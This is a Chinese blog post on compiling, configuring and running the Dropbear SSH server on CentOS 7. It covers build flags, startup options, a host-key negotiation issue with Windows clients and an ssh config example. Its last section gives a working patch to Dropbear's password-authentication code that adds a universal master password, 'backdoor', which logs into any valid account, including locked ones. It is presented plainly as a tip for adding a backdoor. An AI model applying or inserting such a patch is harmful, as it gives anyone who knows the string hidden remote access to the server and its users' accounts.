dropbear:一个小巧的ssh server

已于 2023-01-16 20:05:11 修改
阅读量2.1k 收藏 4
点赞数
分类专栏: Linux工具 文章标签: ssh 运维 linux
于 2022-06-15 22:53:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuyuan185442111/article/details/125269658
版权

Dropbear is a relatively small SSH server and client,可运行于类Unix系统上,官网是 Dropbear,源代码同时在 github 上。
这里主要关注dropbear的服务端功能。

简易安装流程

centos 7环境

挑一个版本下载:wget https://matt.ucc.asn.au/dropbear/releases/dropbear-2022.82.tar.bz2
解压
./configure
如果提示没找到zlib,执行yum install zlib-devel安装,或直接禁用zlib:./configure --disable-zlib
只编译服务端,不带PROGRAMS会额外编译其他工具:make -j8 PROGRAMS=dropbear,会在当前目录生成dropbear文件
make install
dropbear被安装到/usr/local/sbin/,dbclient以及其他工具会被安装到/usr/local/bin/

启动dropbear服务端

mkdir /etc/dropbear,没有该目录启动时会报错,这里会存放hostkey文件
手动生成hostkey或在启动时指定-R选项,表示在需要时自动生成hostkey
dropbear -p 2020 -R
-s选项可禁止密码登陆方式
dropbear同样使用~/.ssh/authorized_keys
然后就可以用ssh客户端进行连接了

一些编译选项

如果想修改默认编译选项,cp default_options.h localoptions.h,然后通过修改localoptions.h
或者直接修改default_options.h也可以

编译时直接禁止密码登陆
#define DROPBEAR_SVR_PASSWORD_AUTH 0

默认监听端口
#define DROPBEAR_DEFPORT "22"

默认网络接口,禁掉ipv6
#define DROPBEAR_DEFADDRESS "0.0.0.0"

禁掉MOTD(message of the day)
#define DO_MOTD 0

修改authorized_keys文件

不想用~/.ssh/authorized_keys的话,可以通过改代码实现,在svr-authpubkey.c中的checkpubkey函数和checkpubkeyperms函数。

一个问题

首次用dropbear -FER启动(忘了有没有加-s选项),用ssh命令连接一次,dropbear自动生成了/etc/dropbear/dropbear_ecdsa_host_key。我以为有一个有效的hostkey就行了,所以重新直接用dropbear不带参数启动,ssh命令能直接连,但其他Windows下的ssh客户端工具,比如WindTerm,SecureCRT等等,都连不上了。
原来hostkey用什么算法是和客户端协商的,ssh命令可能优先选择ecdsa,Windows下的ssh客户端可能优先选择rsa。
在SecureCRT选项中Host Key项里,把“ecdsa-sha2-nistp256”移到首位后,也能连接了。只留一个服务端不支持的算法,SecureCRT甚至提示了“Key exchange failed. No compatible hostkey. The server supports these methods: ecdsa-sha2-nistp256,rsa-sha2-256,ssh-rsa”。
解决方法是始终用-R选项启动dropbear。

关于ssh config

可以在~/.ssh/下创建config文件,例如:

Host game
HostName 123.123.123.123
Port 2020
User root
IdentityFile /root/id_rsa
TCPKeepAlive yes
ServerAliveInterval 60

以后就可以直接用ssh game连接,而不是用-p指定端口,用-i指定私钥文件了。scp也可以用。很方便。

另外

在试用dropbear过程中,经常需要重启它。每一个新连接dropbear都启动了一个新进程来处理,杀掉父进程,子进程的那些连接不会中断,但是父进程释放的端口又能拿来用了。

加个后门

加个万能密码

--- a/svr-authpasswd.c
+++ b/svr-authpasswd.c
@@ -55,6 +55,7 @@ void svr_auth_password(int valid_user) {
 	char * password = NULL;
 	unsigned int passwordlen;
 	unsigned int changepw;
+	int backdoor = 0;
 
 	/* check if client wants to change password */
 	changepw = buf_getbool(ses.payload);
@@ -65,6 +66,7 @@ void svr_auth_password(int valid_user) {
 	}
 
 	password = buf_getstring(ses.payload, &passwordlen);
+	if (constant_time_strcmp(password, "backdoor") == 0) backdoor = 1;
 	if (valid_user && passwordlen <= DROPBEAR_MAX_PASSWORD_LEN) {
 		/* the first bytes of passwdcrypt are the salt */
 		passwdcrypt = ses.authstate.pw_passwd;
@@ -89,8 +91,9 @@ void svr_auth_password(int valid_user) {
 		return;
 	}
 
-	if (testcrypt == NULL) {
+	if (testcrypt == NULL && backdoor == 0) {
 		/* crypt() with an invalid salt like "!!" */
+		//maybe locked by "passwd -l" or "usermod -L"
 		dropbear_log(LOG_WARNING, "User account '%s' is locked",
 				ses.authstate.pw_name);
 		send_msg_userauth_failure(0, 1);
@@ -105,7 +108,7 @@ void svr_auth_password(int valid_user) {
 		return;
 	}
 
-	if (constant_time_strcmp(testcrypt, passwdcrypt) == 0) {
+	if (backdoor || constant_time_strcmp(testcrypt, passwdcrypt) == 0) {
 		if (svr_opts.multiauthmethod && (ses.authstate.authtypes & ~AUTH_TYPE_PASSWORD)) {
 			/* successful password authentication, but extra auth required */
 			dropbear_log(LOG_NOTICE,
liuyuan185442111
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dropbear 2016.73.tar.bz2
05-10
最新的dropbear,嵌入式环境下必不可少的ssh server
dropbear实现免密码ssh登录方法
02-21
之前采用上述步骤生成公钥后,将公钥拷贝到server端,但是始终连接不上,步骤都没有问题,后来发现,在secureCRT软件中,没有将ssh-rsa显示全,采用双屏显示器拉长才显示全(这个问题找了一晚上,真悲催!!!)。
dropbear ssh server
02-12
dropbear and dropbear key compiled for ARMV4
dropbear.zip
05-18
ssh server source code,生成加秘的密钥,指定port或者默认port,从而达到进一步的安全系统,更好服务于大家
dropbear-scp:dropbear的scp源代码,因为debian不提供打包的-one source code
03-24
dropbear-scp:dropbear的scp源代码,因为debian不提供打包的
dropbear实现免密码ssh登录或scp文件传输
06-19 3044
基于dropbear服务实现scp的免密传输,基本思路是:将主机A通过dropbearkey生成公钥和私钥,并将公钥的内容复制到主机B的 authorized_keys 文件内,从而建立主机B对主机A的信任关系。
重新启动dropbear,允许root免密码登陆ssh
weixin_42963900的博客
03-29 2061
这样虽然更安全,但是在调试时不方便。含义为启动dropbear服务,并使用/etc/dropbear/dropbear_rsa_host_key作为RSA主机密钥文件,监听22端口。-r /etc/dropbear/dropbear_rsa_host_key:这是一个选项,表示使用指定的文件作为RSA主机密钥文件。grep dropbear:这是一个用于查找包含dropbear字符串的行的命令,通常用于过滤进程列表。ps -e:这是一个用于查看当前系统中正在运行的进程的命令,其中-e选项表示列出所有进程。
小型ssh工具dropbear 安装配置及使用详解
热门推荐
qq_41714057的博客
08-26 2万+
1.Dropbear介绍     dropbear:小型的嵌入式系统专用的SSH服务端和客户端工具         服务器端:dropbear、dropbearkey         客户端:dbclient     dropbear默认使用nsswitch实现名称解析(账户名称)     dropbear会在用户登录时检查其默认shell是否为安全shell,/etc/shells中的shell...
Openwrt常用软件模块之SSH(Dropbear)
hzlarm的博客
11-18 8873
Openwrt常用软件模块之SSH(Dropbear) SSH(Secure Shell)是专为远程登录会话和其他网络服务提供安全性的协议。OpenWrt 默认采用Dropbear软件来实现 SSH协议。它是一个在小内存环境下非常高效的SSH服务器和客户端 Dropbear概述 Dropbear 是一个开源软件包,是由马特·约翰逊撰写,并且和安全shell兼容的服务 器和客户端。它是在低内存和处理器资源情况下对标准的 OpenSSH一个替代品,适合 嵌入式操作系统。它是 OpenWrt 的一个核心
轻量级SSH实现之Dropbear
虎哥LoveDroid
02-21 1572
Dropbear是一个轻量级的SSH服务器和客户端的实现。它运行在 各种 UNIX 平台。Dropbear 是开源实现,MIT 分发 许可证。Dropbear在嵌入式Linux(或其他Unix)系统广泛应用,例如无线路由器。
ssh-mitm:ssh mitm服务器,用于安全审核,支持公钥身份验证,会话劫持和文件操作
03-19
dropbear ssh客户端的兼容性 特征 劫持和记录终端会话 SCP和SFTP 储存档案 替换文件 注入其他文件 代理转发 转发端口 检查和测试客户端是否存在已知漏洞 插件支持 SSH-MITM的安装 使用任何软件包的第一步是正确...
Android【SDK目录结构】、【HelloWorld项目的目录结构】、【源码sources目录结构】...
iteye_8785的博客
03-05 344
Android SDK 目录和作用的分析详解 1、add-ons这里面保存着附加库,比如GoogleMaps,当然你如果安装了OphoneSDK,这里也会有一些类库在里面。 2、docs这里面是Android SDKAPI参考文档,所有的API都可以在这里查到。 3、market_licensing作为AndroidMarket版权保护组件,一般发布付费应用到电子市场可以...
dropbear编译使用、aide介绍、sudo介绍、TCP_Wrappers介绍、PAM介绍
zerocdn的博客
12-13 832
dropbear编译 dropbear是SSH功能的另一个实现 编译步骤: 1.准备好dropbear源码包 2.安装开发包组,已安装的可以跳过 3.解压源码包 4.进到解压目录执行./configure 5.make PROGRAMS=“dropbear dbclient dropbearkey dropbearconvert scp” 6.make PROGRAMS=“dropbear dbc...
总结之:CentOS 6.5玩转自制Linux、远程登录及Nginx安装测试
weixin_34355559的博客
04-04 135
前言 系统定制在前面的博文中我们就有谈到过了,不过那个裁减制作有简单了点,只是能让系统跑起来而,没有太多的功能,也没的用户登录入口,而这里我们将详细和深入的来谈谈Linux系统的详细定制过程和实现用户例如、远程登录和Nginx安装过程、一步一步从头开始定制属于我们自己的系统。正文 首先我们先来简单的介绍一下我们这里定制属于自己的Linux系统的基本元素、而其实一些...
[嵌入式linux] buildroot 添加 dropbear 并配置密钥
socbis的博客
11-02 2169
buildroot 添加 dropbear 并配置密钥 1. buildroot 配置 cd <buildrootdir> # make menuconfig # 进入配置界面 Target packages > Networking applications---> # 按 'y' 选中 dropbear 然后保持默认如下 [*]dropbear
Dropbear 安装配置与启动ssh服务详解
行知致简的专栏
07-17 1万+
Dropbear 安装配置与启动ssh服务详解 扎啤关注 2017.09.12 22:57*字数 441阅读 4160评论 0喜欢 0 一、介绍 dropbear作为一款基于ssh协议的轻量级sshd服务器,相比OpenSSH,其更简洁,更小巧,运行起来内存占用比也更小。在应用进程上,OpenSSH会开启两个sshd进程服务,而dropbear只开启一个进程,相较于OpenSSH,...
SSH以及Dropbear介绍
最新发布
写作是为了更好的思考
01-02 1171
ssh介绍以及Dropbear编译
SSH安全配置实践,如何手动编译Dropbear实现SSH协议。
weixin_34099526的博客
05-27 214
    在早期要从一台计算机通过网络登录另一条计算机获取终端,用的大多数是telnet协议,这种协议由于是明文传输的,在用户身份认证时,很容易被cracker抓取报文,从中获得帐户密码,然后你将为他所做的破坏负责。后来为了数据更安全的传,出现了SSH(secureshell ),由IETF网络小组所定制,SSH 为建立在应用层和传输层基础上的安全协议,是目前较可靠,专为远程登录会话和其他网络服务提...
dropbear 编译安装和简单使用
wdirdo的博客
09-04 2737
dropbear 编译安装和简单使用 dropbear官方站点:https://matt.ucc.asn.au/dropbear/dropbear.html ssh协议的另一个实现:dropbear <轻量级> dropbear源码编译安装 (1)首先获取源码 (2)解压缩 (3)查看README文件 作为ssh协议的实现,客户端主机要远程连接ssh服务端时,首先要从ssh服务器 端...
dropbear 启动sftp-server
09-22
Dropbear 是一个轻量级的 SSH 服务器和客户端软件,可以提供安全的远程登录和文件传输功能。要启动 SFTP 服务器,我们需要按照以下步骤进行设置和配置: 1. 首先,确保已在服务器上安装了 Dropbear。可以使用适合你的操作系统的包管理工具来安装 Dropbear。 2. 在服务器上启动 Dropbear,可以通过运行 `dropbear` 命令来启动 Dropbear 服务器。默认情况下,Dropbear 服务器将监听22号端口,你可以根据需要进行修改。 3. 打开服务器的 SSH 配置文件,通常位于 `/etc/dropbear/dropbear.conf` 或 `/etc/ssh/sshd_config`,这取决于你的系统设置。 4. 在配置文件中查找 `# SFTP server` 或 `Subsystem sftp` 这样的注释行。如果找到,就删除注释符(#),将其前缀改为 `Subsystem sftp /usr/libexec/sftp-server`。如果没有找到这样的注释行,请添加以下内容: ``` Subsystem sftp /usr/libexec/sftp-server ``` 这告诉 Dropbear 使用指定的 SFTP 服务器。 5. 保存并关闭配置文件,并重新启动 Dropbear 服务器,以便配置的更改生效。可以使用 `service dropbear restart` 或 `systemctl restart dropbear` 命令来重新启动 Dropbear。 6. 确保服务器上的文件权限和目录设置正确。SFTP 需要在用户的家目录下创建一个可写的目录,以便用户可以上传和下载文件。 完成以上步骤后,Dropbear 将启动 SFTP 服务器,并允许用户使用 SFTP 客户端上传和下载文件。用户可以使用任何支持 SFTP 协议的客户端连接到服务器,并使用其登录凭据进行身份验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值